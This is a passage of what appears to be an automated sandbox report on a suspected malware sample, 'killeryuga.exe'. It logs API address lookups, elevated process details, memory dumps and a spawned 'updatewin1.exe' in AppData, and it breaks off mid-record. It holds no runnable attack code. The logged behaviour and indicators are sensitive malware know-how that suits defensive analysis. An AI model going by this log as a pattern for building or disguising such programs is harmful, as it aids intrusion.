Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:39 (UTC) True 1
Fn
System Get Time type = Ticks, time = 121961 True 1
Fn
System Get Time type = Performance Ctr, time = 18452518574 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Process #7: killeryuga.exe
442 0
»
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Service 2460 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0x9d8
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9DC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
Threads
Thread 0x9dc
222 0
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x75b14124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x75b1439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:39 (UTC) True 1
Fn
System Get Time type = Ticks, time = 122070 True 1
Fn
System Get Time type = Performance Ctr, time = 18467392580 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Process #8: updatewin1.exe
671 0
»
Information Value
ID #8
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe"
